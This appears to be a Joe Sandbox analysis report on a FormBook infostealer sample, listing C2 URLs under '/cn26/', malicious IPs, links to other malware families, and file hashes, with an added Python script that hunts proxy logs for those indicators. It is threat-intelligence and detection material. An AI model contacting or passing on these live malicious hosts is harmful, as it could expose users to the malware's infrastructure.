http://www.tires-book-robust.bond/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.j0mui3.shop | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dehamobilya.comReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.happyjumps.co/cn26/www.tires-book-robust.bond | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tires-book-robust.bondReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dehamobilya.com/cn26/www.happyjumps.co | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.foton.africaReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.j0mui3.shop/cn26/www.cgffwelcome.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cgffwelcome.com/cn26/www.dehamobilya.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sswpdx.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | hOe2JrpIAE.exe | false | URL Reputation: safe | unknown
https://outlook.com | explorer.exe, 00000007.00000003.3777677954.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3098080000.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096597969.0000000009B7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4447809365.0000000009D42000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cgffwelcome.com/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tempotrekstore.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yipicircle.life/cn26/www.tempotrekstore.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiensbangladesh.netReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yipicircle.lifeReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOS | explorer.exe, 00000007.00000000.2009042834.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.cgffwelcome.comReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.theburnscleanteam.com/cn26/www.tiensbangladesh.net | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/ | explorer.exe, 00000007.00000002.4446934807.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.shopusuniform.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sswpdx.comReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.xztyvk.xyzReferer:explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://crl.vexplorer.exe, 00000007.00000000.2007072938.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4441584000.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.yipicircle.life/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.ajtsistemas.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.xztyvk.xyz/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.xztyvk.xyz/cn26/www.sswpdx.comexplorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.tempotrekstore.com/cn26/explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
IP | Domain | Country | ASN | ASN Name | Malicious
14.128.41.165 | pa94nj5r.vakcloud.com | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
199.59.243.226 | www.shopusuniform.com | United States | 395082 | BODIS-NJUS | true
34.149.87.45 | td-ccm-neg-87-45.wixdns.net | United States | 2686 | ATGS-MMD-ASUS | true
162.244.93.3 | www.tiensbangladesh.net | United States | 53667 | PONYNETUS | true
3.33.130.190 | yipicircle.life | United States | 8987 | AMAZONEXPANSIONGB | true
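The URL and IP tables above are the hunt set for this sample: nine hosts pulled from explorer.exe memory, all sharing the /cn26/ directory, and five resolved addresses the report marks malicious. Note that the per-URL Avira verdict is "safe" for every one of those hosts, so a hunt has to key on the host and address list, not on that verdict. The script below is added here as an example and is not part of the Joe Sandbox report or of any vendor tooling: it scans proxy log lines against that set. The log format and the sample lines are constructed; the four-character-directory heuristic and the host-rotation threshold are the editor's assumptions, drawn from the context table on this page where other FormBook samples use /qpcj/, /zq0e/, /k4dg/ and similar directories.

```python
"""Hunt proxy logs for the FormBook C2 set listed in this report.

Added example, not part of the Joe Sandbox report or of any vendor tooling.
Hosts, IPs and the "/cn26/" directory are copied from the report's URL and IP
tables; the proxy log lines are constructed for the demo, and the
rotation/4-character-path heuristics are the editor's assumptions drawn from
the context table on this page (/qpcj/, /zq0e/, /k4dg/, ...).
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Hosts found as URL strings in explorer.exe memory (report URL table).
C2_HOSTS = {
    "www.cgffwelcome.com", "www.tempotrekstore.com", "www.yipicircle.life",
    "www.tiensbangladesh.net", "www.theburnscleanteam.com",
    "www.shopusuniform.com", "www.sswpdx.com", "www.xztyvk.xyz",
    "www.ajtsistemas.com",
}
# Resolved addresses the report marks Malicious: true.
C2_IPS = {"14.128.41.165", "199.59.243.226", "34.149.87.45",
          "162.244.93.3", "3.33.130.190"}
# Every C2 URL in this sample's configuration shares one directory.
C2_PATH = "/cn26/"
# Assumption: a bare four-character alphanumeric directory is only a weak signal.
WEAK_PATH = re.compile(r"^/[a-z0-9]{4}/$")
# Assumption: one client cycling the same directory over several hosts is a
# strong signal; in the report one process held nine hosts with one directory.
ROTATION_MIN_HOSTS = 3

# Constructed log format: timestamp client dst_ip method url
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$"
)


@dataclass(frozen=True)
class Hit:
    ts: str
    client: str
    url: str
    severity: str
    reason: str


def classify(dst: str, url: str):
    """Return (severity, reason) for one request, or (None, "") if clean."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    if host in C2_HOSTS or dst in C2_IPS:
        if path == C2_PATH:
            return "high", "known FormBook host with the report's C2 directory"
        return "medium", "known FormBook host/IP"
    if path == C2_PATH:
        return "medium", "report's C2 directory on an unlisted host"
    if WEAK_PATH.match(path):
        return "low", "four-character directory (FormBook-like URI shape)"
    return None, ""


def scan(lines):
    """Classify each request, then add one rotation hit per client/path pair."""
    hits = []
    seen = defaultdict(lambda: defaultdict(set))  # client -> path -> hosts
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        sev, why = classify(m["dst"], m["url"])
        if sev:
            hits.append(Hit(m["ts"], m["client"], m["url"], sev, why))
        parts = urlsplit(m["url"])
        path = parts.path or "/"
        if path == C2_PATH or WEAK_PATH.match(path):
            seen[m["client"]][path].add((parts.hostname or "").lower())
    for client, paths in seen.items():
        for path, hosts in paths.items():
            if len(hosts) >= ROTATION_MIN_HOSTS:
                hits.append(Hit("", client, path, "high",
                                f"{len(hosts)} hosts contacted with directory {path}"))
    return hits


# Constructed sample log; 10.0.0.15 mimics the explorer.exe traffic in the report.
SAMPLE_LOG = """\
2024-07-03T12:50:12Z 10.0.0.15 162.244.93.3 GET http://www.tiensbangladesh.net/cn26/?x=1
2024-07-03T12:50:20Z 10.0.0.15 3.33.130.190 GET http://www.yipicircle.life/cn26/
2024-07-03T12:50:31Z 10.0.0.15 199.59.243.226 GET http://www.shopusuniform.com/cn26/
2024-07-03T12:50:44Z 10.0.0.15 198.51.100.9 POST http://www.decoy-not-in-report.test/cn26/
2024-07-03T12:51:02Z 10.0.0.22 93.184.216.34 GET http://www.example.com/news/
2024-07-03T12:51:09Z 10.0.0.22 203.0.113.5 GET http://cdn.example.net/ab12/
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(f"[{h.severity:6}] {h.client:10} {h.url} -- {h.reason}")
```

On the constructed log the three listed hosts score high, the unlisted host using /cn26/ scores medium, and 10.0.0.15 also gets a rotation hit for touching four hosts with one directory. The /news/ line shows why the bare four-character pattern is kept at low severity: it matches ordinary paths, so it is only useful as a pivot once a client already has a stronger hit.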
                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1466892
                                                  Start date and time:2024-07-03 14:49:03 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 11m 47s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Sample name:hOe2JrpIAE.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:f3b25ff7dc9cfcab029413dbaab77efdb5017d72ff5c0cc4d88769de1def78a6.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@14/1@12/5
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 206
                                                  • Number of non-executed functions: 294
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: hOe2JrpIAE.exe
Time | Type | Description
08:49:48 | API Interceptor | 1x Sleep call for process: hOe2JrpIAE.exe modified
08:49:56 | API Interceptor | 9556642x Sleep call for process: explorer.exe modified
08:50:33 | API Interceptor | 8535039x Sleep call for process: netsh.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
199.59.243.226 | factura.exe | malicious | FormBook | www.4cityclean.uno/qpcj/
199.59.243.226 | RSW6103D401005.exe | malicious | FormBook | www.42bomclub.com/zq0e/
199.59.243.226 | 82xul16VKj.exe | malicious | CryptOne, Vidar | survey-smiles.com/
199.59.243.226 | rPRESUPUESTO.exe | malicious | FormBook | www.mommysdaycare.net/k4dg/
199.59.243.226 | 1R50C5E13BU8I.exe | malicious | FormBook | www.42bomclub.com/zq0e/
199.59.243.226 | AWB 112-17259653.exe | malicious | FormBook | www.window-replace5.top/dihh/
199.59.243.226 | eiqj38BeRo.rtf | malicious | FormBook | www.home-repair-contractors-kfm.xyz/btrd/?OR-TJfQ=eVMlJIJ+geaZUobAArdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImMamgZk5Kk8mIb1RaQ==&2dc=kvXd-rKHCF
199.59.243.226 | mEESdHRhbB.exe | malicious | FormBook | www.42bomclub.com/zq0e/
199.59.243.226 | SWU5109523I.exe | malicious | FormBook, Lokibot | www.42bomclub.com/zq0e/
199.59.243.226 | Invoice_Payment.exe | malicious | FormBook | www.mommysdaycare.net/k4dg/
34.149.87.45 | Project Execution Order - (PO 546788) (PO 546789).exe | malicious | FormBook | www.sfumaturedamore.net/45er/?op=K2MPclUpT0JDpb&jzrtSdh=5wac7XqF5C9tO/nu2iKY7UFJ2BpGPyVCoaFtUPotinLFY92r5LCsbso9vos8/jtTwdb8kOP9aA==
34.149.87.45 | iY.exe | malicious | FormBook | www.slow-man.com/ss63/?tZUX=+NZTuPPY/oeUIRAuFrVBxY7clWbjoDnyDgHMPE4tMjWGhJuUs1HH/Uo/WPSJAV9Bim89&Unw0O=GTgtavpHB8N4TP4
34.149.87.45 | hdBLUdo056.exe | malicious | FormBook | www.ar-robotics.com/8gw5/
34.149.87.45 | fiY5fTkFKk.rtf | malicious | FormBook | www.ar-robotics.com/8gw5/
34.149.87.45 | pismo1A 12.06.2024.exe | malicious | FormBook | www.magnoliahairandco.com/fkxp/
34.149.87.45 | tEBdYCAxQC.rtf | malicious | FormBook | www.ar-robotics.com/8gw5/
34.149.87.45 | Invitation to Tender (ITT) - TED-DRL-2024-024 - Supply PDF.exe | malicious | FormBook | www.citizens4daniellee.com/38gc/?-ZeHznp=11VPRfYnqOA19NgIQbS33B+HdkvJIujSOwILAFGQAEF0SeNj9OqkcReekQ+de2CnKCCJ&NjopTP=llxdA
34.149.87.45 | 2OdHcYtYOMOepjD.exe | malicious | FormBook | www.ar-robotics.com/dhra/
34.149.87.45 | CFV20240600121.exe | malicious | FormBook | www.magnoliahairandco.com/fkxp/
34.149.87.45 | PR-ZWL 07364G49574(Revised PO).exe | malicious | FormBook | www.aretikokkoris.com/bnz5/
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
td-ccm-neg-87-45.wixdns.net | Swift_payment_pdf.exe | malicious | FormBook | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | Project Execution Order - (PO 546788) (PO 546789).exe | malicious | FormBook | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://www.facnma.org | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://www.onedrive-strabag.com/ | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://bitbucket.oreaillyauto.com/ | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://dllavy.wixsite.com/mybt-view/ | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | https://peringatanfb772.wixsite.com/mysite | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://trace.usafilesamrenewal.com/analytics/YkZriEv3qM7BWIziU7JcA9c0576GuKdK/clicked?url=https://shopusafiling.com/ | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | http://h3200457.wixsite.com/my-site-1/ | malicious | Unknown | 34.149.87.45
td-ccm-neg-87-45.wixdns.net | original.eml | malicious | HTMLPhisher | 34.149.87.45
pa94nj5r.vakcloud.com | unexpressiveness.exe | malicious | FormBook, GuLoader | 14.128.41.166
pa94nj5r.vakcloud.com | Ballahoo.exe | malicious | FormBook, GuLoader | 14.128.41.164
pa94nj5r.vakcloud.com | payment-order90094983.exe | malicious | FormBook, PureLog Stealer | 202.79.175.217
googleyou.qqdns.shop | HSBC Payment Advice.img.exe | malicious | FormBook | 34.96.176.101
googleyou.qqdns.shop | ROVM7fV8KR.exe | malicious | FormBook, PureLog Stealer | 34.96.176.101
googleyou.qqdns.shop | WvwNJkZ8jcQuUnb.exe | malicious | FormBook, PureLog Stealer | 34.96.176.101
googleyou.qqdns.shop | pD6GwnXo7Mm3J8u.exe | malicious | FormBook, PureLog Stealer | 34.96.176.101
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
BODIS-NJUS | factura.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | RSW6103D401005.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | 82xul16VKj.exe | malicious | CryptOne, Vidar | 199.59.243.226
BODIS-NJUS | rPRESUPUESTO.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | 1R50C5E13BU8I.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | AWB 112-17259653.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | http://sdfa.liveblog365.com/ares/hades.txt | malicious | Unknown | 199.59.243.225
BODIS-NJUS | LinuxTF.elf | malicious | Unknown | 199.59.243.226
BODIS-NJUS | eiqj38BeRo.rtf | malicious | FormBook | 199.59.243.226
BODIS-NJUS | mEESdHRhbB.exe | malicious | FormBook | 199.59.243.226
ATGS-MMD-ASUS | https://u6071375.ct.sendgrid.net/ls/click?upn=u001.jNebCYco-2BJgBMGJDj1kJWP39IKixFvDeSBij1PLovvXT0hkMSWjEhuIEgwQ-2F309CwGFmoY6-2Bl45VLW7K9Sd8-2Fg-3D-3Dm1D8_bgsmQmhs-2BDkrnAcljUiGIti1-2F3303-2FliL2Lyr586-2FN9rAlBFKILfRyjObk6Iz5-2FtMSxC-2FhiWOZXbqnmzeZXBiy3CSpPIYxz2-2BTcFMtFX6z-2FFKaL9cuMNNsd9H8Soth9M-2BiGwIhw5kRyphke6a8RYyV0rtdDONsX7lNk6Cr796v-2FIJZ8nzBJ39o6b-2FDySakEM-2B9nvScrgUWzDogJp7LxfPQ-3D-3D | malicious | HTMLPhisher | 34.160.63.108
ATGS-MMD-ASUS | https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20= | malicious | Unknown | 34.160.236.64
ATGS-MMD-ASUS | Swift_payment_pdf.exe | malicious | FormBook | 34.149.87.45
ATGS-MMD-ASUS | watchdog.elf | malicious | Mirai | 34.18.178.200
ATGS-MMD-ASUS | spc.elf | malicious | Mirai | 57.62.103.186
ATGS-MMD-ASUS | watchdog.elf | malicious | Mirai | 34.190.213.169
ATGS-MMD-ASUS | https://supp-review9482.eu/ | malicious | Unknown | 34.36.178.232
ATGS-MMD-ASUS | http://multichaindappsx.pages.dev/ | malicious | Unknown | 34.149.50.64
ATGS-MMD-ASUS | https://swans-muffin-1id4964-7304421.netlify.app/form | malicious | Unknown | 34.149.250.58
ATGS-MMD-ASUS | https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/ | malicious | Unknown | 34.149.250.58
BCPL-SGBGPNETGlobalASNSG | 998_popxinv_Installer.exe | malicious | XWorm | 134.122.174.169
BCPL-SGBGPNETGlobalASNSG | h8N9qpyRAPaiitu.exe | malicious | FormBook | 14.128.41.167
BCPL-SGBGPNETGlobalASNSG | sora.mpsl.elf | malicious | Mirai | 118.107.53.143
BCPL-SGBGPNETGlobalASNSG | Request for Quotation - e092876.exe | malicious | FormBook | 118.107.56.38
BCPL-SGBGPNETGlobalASNSG | Dtjgu2gHw0.elf | malicious | Mirai | 137.220.211.71
BCPL-SGBGPNETGlobalASNSG | cEEsFMSdw8.elf | malicious | Mirai | 118.107.53.144
BCPL-SGBGPNETGlobalASNSG | PTT requested quotation.exe | malicious | FormBook | 118.107.56.40
BCPL-SGBGPNETGlobalASNSG | GOoY5QBqvC.elf | malicious | Mirai, Moobot | 118.107.53.127
BCPL-SGBGPNETGlobalASNSG | https://whastappg.top/ | malicious | Unknown | 216.224.126.59
BCPL-SGBGPNETGlobalASNSG | 666.exe | malicious | Unknown | 143.92.49.135
PONYNETUS | execute_and_cleanup.sh | malicious | Unknown | 209.141.53.247
PONYNETUS | ReMX69vsiG.elf | malicious | Unknown | 205.185.124.200
PONYNETUS | 0S3wxWer8x.elf | malicious | Unknown | 209.141.53.247
PONYNETUS | ausNOyj9by.elf | malicious | Unknown | 209.141.53.247
PONYNETUS | W4bP4K6GeP.elf | malicious | Unknown | 209.141.53.247
PONYNETUS | HvuWdJQMCR.elf | malicious | Unknown | 209.141.53.247
PONYNETUS | Vij3FJ8y4o.elf | malicious | Unknown | 209.141.53.247
PONYNETUS | 209.141.57.51-x86-2024-07-01T10_22_46.elf | malicious | Gafgyt, Mirai | 209.141.57.51
PONYNETUS | 209.141.57.51-mips-2024-07-01T10_22_47.elf | malicious | Gafgyt, Mirai | 209.141.57.51
PONYNETUS | BVwjyOTKbI.elf | malicious | Mirai, Gafgyt, Okiru | 107.189.29.207
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4x84j:MxHKlYHKh3oIHKx1qHitHo6hAHKze0HJ
                                                  MD5:3B0A5F209832627405ECFECB3F0D87AD
                                                  SHA1:E808346EA598D760F1835D80B55BCF3484F50F8C
                                                  SHA-256:3A087D73802A278BC76F379CDFB9C93501DAFFE4FEE541A7EF40F8EEC9CD9AE9
                                                  SHA-512:5F890540FD0F79C6855A0AB2E8943247FAFFB22C66B8CD0018497BEBDE28F61EC5C3B0D358FA0A4B6C78130F2375A1CEBB05B741C2D8C4159F3D75D835EC8998
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.957071293577967
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:hOe2JrpIAE.exe
                                                  File size:674'824 bytes
                                                  MD5:21a8497522de5b8b12067fca910e0469
                                                  SHA1:314794ef8b3b0fc2f1efc2a68e04caa0e371ff25
                                                  SHA256:f3b25ff7dc9cfcab029413dbaab77efdb5017d72ff5c0cc4d88769de1def78a6
                                                  SHA512:565e2558a19a9c5655e992bb09c318e00b9cf302dd1c86e889798c97066876cd46f4da9b47ddea0ea2386dd904d9e7cf2c920fbbbc9fe106d582c34b2d3dbac0
                                                  SSDEEP:12288:AbAASYMjhvPie/rByY7777777777777IxjJpI4SrsHIeCf6Xvfkn6lDNvkxm/GuK:AbAASYMFniyy7gQJQ686lDYmlpqSTpw
                                                  TLSH:C0E42327327CE851DAACCB320289519253B2B2139566EBC45CC31DED6DEA7B03B00F57
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.Bf..............0.............B(... ...@....@.. ....................................@................................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x4a2842
                                                  Entrypoint Section:.text
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6642DF2A [Tue May 14 03:48:58 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Signature Valid:false
                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
